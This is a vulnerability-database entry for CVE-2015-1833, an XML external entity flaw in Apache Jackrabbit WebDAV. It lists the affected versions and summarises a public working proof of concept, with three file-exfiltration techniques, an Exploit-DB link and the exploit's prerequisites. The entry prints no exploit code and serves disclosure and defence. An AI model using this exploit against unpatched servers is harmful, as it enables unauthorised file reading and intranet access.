CVE-2015-1833

Apache Jackrabbit XML External Entity Injection via WebDAV Request

Title source: llm

Exploitation Summary

EIP tracks 1 public exploit for CVE-2015-1833. PoCs published by Mikhail Egorov.

AI-analyzed exploit summary This exploit demonstrates an XXE (XML External Entity) vulnerability in Apache Jackrabbit WebDAV (CVE-2015-1833). It includes three techniques (inb1, inb2, oob) to exfiltrate data via crafted PROPPATCH/PROPFIND requests or out-of-band FTP.

Description

XML external entity (XXE) vulnerability in Apache Jackrabbit before 2.0.6, 2.2.x before 2.2.14, 2.4.x before 2.4.6, 2.6.x before 2.6.6, 2.8.x before 2.8.1, and 2.10.x before 2.10.1 allows remote attackers to read arbitrary files and send requests to intranet servers via a crafted WebDAV request.

Exploits (1)

exploitdb WORKING POC

by Mikhail Egorov · pythonwebappsjava

https://www.exploit-db.com/exploits/37110

View Code ZIP pw:eip

This exploit demonstrates an XXE (XML External Entity) vulnerability in Apache Jackrabbit WebDAV (CVE-2015-1833). It includes three techniques (inb1, inb2, oob) to exfiltrate data via crafted PROPPATCH/PROPFIND requests or out-of-band FTP.

Classification

Working Poc 95%

Attack Type

Info Leak

Complexity

Moderate

Reliability

Reliable

Target: Apache Jackrabbit WebDAV (versions prior to 2.10.1), Apache Sling, Adobe AEM

No auth needed

Prerequisites: Network access to the target WebDAV endpoint · For inb2/oob techniques, a visible IP for callback communication

MITRE ATT&CK